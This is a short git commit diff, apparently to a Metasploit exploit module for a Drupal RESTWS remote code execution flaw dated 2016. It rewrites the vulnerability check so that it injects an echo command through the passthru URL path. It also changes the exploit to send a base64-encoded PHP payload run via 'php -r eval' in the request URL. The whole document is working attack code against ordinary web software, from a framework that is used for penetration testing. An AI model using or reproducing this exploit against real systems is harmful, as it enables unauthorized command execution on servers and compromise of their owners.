Change check method and use meterpreter instead of unix cmd

mdisec · mdisec · commit ec2f8fcc7102 · 2016-07-19T11:13:06.000+03:00
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -35,16 +35,10 @@ def initialize(info={})
       'Privileged'     => false,
       'Payload'        =>
         {
-          'DisableNops' => true,
-          'Space'       => 1024,
-          'Compat'      =>
-            {
-                'PayloadType' => 'cmd',
-                'RequiredCmd' => 'generic python',
-            }
+          'DisableNops' => true
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
       'Targets'        => [ ['Automatic', {}] ],
       'DisclosureDate' => 'Jul 13 2016',
       'DefaultTarget'  => 0
@@ -58,20 +52,26 @@ def initialize(info={})
   end
 
   def check
-    url = normalize_uri(target_uri.path, "node.xml")
+    r = rand_text_alpha(8 + rand(4))
+    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => url
     )
-    if res && res.code == 403
+    if res && res.body =~ /#{r}/
       return Exploit::CheckCode::Appears
     end
     return Exploit::CheckCode::Safe
   end
 
   def exploit
-    r = rand_text_alpha(4 + rand(4))
-    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/", r ,"/passthru/", Rex::Text.uri_encode(payload.encoded))
+    random = rand_text_alpha(1 + rand(2))
+    url = normalize_uri(target_uri.path,
+      "?q=taxonomy_vocabulary/",
+      random ,
+      "/passthru/",
+      Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
+    )
     send_request_cgi(
       'method' => 'GET',
       'uri' => url
